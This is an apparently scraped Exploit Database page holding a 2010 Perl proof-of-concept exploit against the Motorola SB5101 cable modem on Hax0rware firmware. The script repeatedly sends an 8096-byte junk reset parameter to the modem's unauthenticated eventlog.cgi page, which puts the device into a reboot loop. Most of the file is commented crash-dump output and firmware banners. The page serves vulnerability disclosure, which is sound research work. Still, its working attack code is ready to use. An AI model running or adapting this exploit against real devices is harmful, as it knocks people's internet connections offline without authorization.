Motorola SB5101 – Hax0rware Event Reset Remote Overflow

• Exploit Database
• 123 阅读

• 作者： Dillon Beresford
  日期： 2010-06-08
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/13775/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197

  #!/usr/bin/perl   # Motorola SB5101 Hax0rware Event Reset Remote Overflow # Tested on Hax0rware 1.1 R30, R32 and R39 # Author: Dillon Beresford # Date: 6/6/2010 # Vendor: Motorola Corporation and SBHacker ( SBHacker has been notified of the vuln ). # Software Link: http://www.sbhacker.net/forum/index.php # Description: Motorola SB5101 Hax0rware Event Reset Remote Buffer Overflow # An unauthenticated attacker could send multiple log reset requests to eventlog.cgi, # causing a a denial of service, which would send the cable modem into a reboot loop. # For debugging telnet into the device 192.168.100.1 and run the poc.   # >>> YIKES... looks like you may have a problem! <<<   # r0/zero=00000000 r1/at=80510000 r2/v0=00000000 r3/v1=00000002 # r4/a0=ac100102 r5/a1=00000000 r6/a2=00000001 r7/a3=8069b914 # r8/t0=00000001 r9/t1=00000000 r10/t2 =00000001 r11/t3 =00000000 # r12/t4 =00000000 r13/t5 =00000000 r14/t6 =00000000 r15/t7 =00000005 # r16/s0 =807bd04c r17/s1 =807bd004 r18/s2 =807bd000 r19/s3 =8069bb90 # r20/s4 =8069bb88 r21/s5 =11110015 r22/s6 =11110016 r23/s7 =11110017 # r24/t8 =00000000 r25/t9 =00000009 r26/k0 =807d2698 r27/k1 =8069bc7c # r28/gp =80458fa0 r29/sp =8069b910 r30/fp =8069b970 r31/ra =80197d24   # PC : 0x80197e14error addr: 0xac100102 # cause: 0x00000010status: 0x1000ff03   # BCM interrupt enable: fffffff7, status: 00000000 # Instruction at PC: 0x8c830000   # entry 80197c58called from 801dbe10 # entry 801dbd08called from 80242f64 # entry 80242eb8called from 802fb2e4 # entry 802fb2accalled from 802fb2a4 # entry 802fb2acReturn address (00000000) invalid.Trace stops.   # Task: NetToMedia Thread # --------------------------------------------------- # ID: 0x0025 # Handle: 0x8069ba24 # Set Priority: 23 # Current Priority: 23 # State:SUSP # Stack Base: 0x8069a9b0 # Stack Size: 4096 bytes # Stack Used: 1088 bytes # Stack StackStack # TaskId TaskNamePriority StateSizeUsed Margin # ---------- ------------------------------------------------------------------------ # 0x8048f818 Idle Thread31 RUN 20481064 984 # 0x805131d0 Network alarm support 6 SLEEP 225612321024 # 0x804924c8 Network support 7 SLEEP 819218246368 # 0x80513f20pthread.0000080015EXIT 785211046748 # 0x8048a1c8tStartup18 SLEEP1228852087080 # 0x8054b9ac Rajko HttpD23 SLEEP 328021641116 # 0x807f579cNonVol Device Async Helper25 SLEEP 3072 5042568 # 0x807ebc7cMotorola Standby Switch Thread23 SLEEP 4096 4403656 # 0x807ea984Motorola Vendor Ctl Thread23 SLEEP 4096 5123584 # 0x807f64e8WDOG17 RUN 512027842336 # 0x807e8eb0 BFC Ping Thread29 SLEEP 6144 4765668 # 0x807e870c ConsoleThread27 RUN368642168 34696 # 0x807d6c58 TelnetD23 RUN 22562040 216 # 0x807ca564CfgVB Thread23 SLEEP 4096 5163580 # 0x807c5400DHCM25 SLEEP16384 516 15868 # 0x807bf390 Event25 SLEEP0 0 0 OVERFLOW # 0x8079a900Time Of Day Thread23 SLEEP 6144 4605684 # 0x8079ad70CmDocsisIpThread23 SLEEP 8192 5087684 # 0x80793edc CmBpiManagerThd25 SLEEP 8192 5127680 # 0x8079035c CmDsxHelper23 SLEEP 8192 5087684 # 0x807ac334 CmDocsisCtlThread21 SLEEP 8192 5167676 # 0x80789228Scan Downstream Thread23 SLEEP 409614162680 # 0x80786004RateShaping Thread23 SLEEP 4096 4483648 # 0x807f65e0CMHL23 SLEEP 4500 3724128 # 0x807f66d8CMHH21 SLEEP 4500 3564144 # 0x807f67d0ENRX23 SLEEP 450012483252 # 0x807f68c8ENTX23 SLEEP 4500 7883712 # 0x807f69c0ELNK23 SLEEP 4500 3244176 # 0x807f6ab8USTX23 SLEEP 4500 3444156 # 0x807f6bb0USRX23 SLEEP 4500 3764124 # 0x807f6ca8UBCT19 SLEEP 4500 3604140 # 0x807f6da0USRN23 SLEEP 4500 3444156 # 0x806a5e18DHCP Client Thread23 SLEEP12288 512 11776 # 0x807f6e98IpHalIst23 RUN 4500 8163684 # 0x8069ff7cCmPropaneCtlThread23 SLEEP 819216326560 # 0x8069d320 IGMP Thread23 SLEEP 4096 4603636 # 0x8069ba24 NetToMedia Thread23SUSP 409610883008 # 0x8069798c Trap Thread23 SLEEP16384 504 15880 # 0x807f6030 SNMP Thread23 SLEEP204801196 19284 # 0x805aaf20DHCP Server Thread23 SLEEP 819214486744 # 0x8047b410tNonVolTimer30 SLEEP 2048 2921756   # * * #*** *** #*** *** #*** *** # ***** ***** # ***** ***** # ***** ***** #******* ******* #******* ******* #******* ******* # ********* ********* # ********* ********* # ******* ******* #********* #*** * *** #** ** # ** ** # ** ** #** ** #* * #MotorolaCorporation   # +----------------------------------------------------------------------------+ # | _/_/ _/_/_/_/_/_/| # |_/_/ _/_/_/ Broadband | # | _/_/ _/_/| # |_/_/ _/_/_/_/ Foundation| # | _/_/ _/_/| # |_/ _/_/_/_/ Classes | # | _/_/_/ _/_/_/| # || # | Copyright (c) 1999 - 2007 Broadcom Corporation | # || # | Revision:3.9.33.3 RELEASE| # || # | Features:Console Nonvol Fat HeapManager SNMP Networking USB1.1 | # +----------------------------------------------------------------------------+ # | Standard Embedded Target Support for BFC | # || # | Copyright (c) 2003 - 2007 Broadcom Corporation | # || # | Revision:3.0.1 RELEASE | # || # | Features:PID=0xc011 Bootloader-Rev=2.1.6d| # | Copyright (c) 2003 - 2007 Broadcom Corporation | # || # | Revision:3.0.1 RELEASE | # || # | Features:PID=0xc011 Bootloader-Rev=2.1.6d| # | Features:Bootloader-Compression-Support=0x19 | # +----------------------------------------------------------------------------+ # | eCos BFC Application Layer | # || # | Copyright (c) 1999 - 2007 Broadcom Corporation | # || # | Revision:3.0.2 RELEASE | # || # | Features:eCos Console Cmds, (no Idle Loop Profiler)| # +----------------------------------------------------------------------------+ # | _/_/_/ _/| # |_/_/_/_/ _/_/ DOCSIS Cable Modem| # | _/_/_/ _/| # |_/_/ _/ | # | _/_/ _/| # |_/_/_/ _/ | # | _/_/_/ _/| # || # | Copyright (c) 1999 - 2005 Broadcom Corporation | # || # | Revision:3.9.33.3 RELEASE| # || # | Features:AckCel(tm) DOCSIS 1.0/1.1/2.0 Propane(tm) CM SNMP w/Factory MIB | # | Features:Support CM Vendor Extension | # +----------------------------------------------------------------------------+ # | Motorola Data-Only CM Vendor Extension | # || # | Revision:3.0.0a RELEASE| # || # | Features:DHCP ServerHTTP Server| # +----------------------------------------------------------------------------+ # | Build Date:Apr 29 2009 | # | Build Time:15:08:51| # | Built By:vobadm02| # +----------------------------------------------------------------------------+   use LWP::Simple;   my $junk = "\x31" x 8096;   print "+---------------------------------------------------------------+\n". "| Motorola SB5101 Hax0rware Event Reset Remote Overflow |\n". "| Motorola: SB5101-2.7.6.0-GA-00-NOSH |\n". "| Version: 1.1 R30, R32 and R39 |\n". "| Vendor: Motorola Corporation and SBHacker |\n". "| Author: Dillon Beresford|\n". "| Date: 6/6/2010|\n". "+---------------------------------------------------------------+\n";   for ($count = 1; $count < 256; $count++) { $contents = get("http://192.168.100.1/eventlog.cgi?reset=".$junk); print "sending request to cable modem\n"; }   print "We killed it!\n";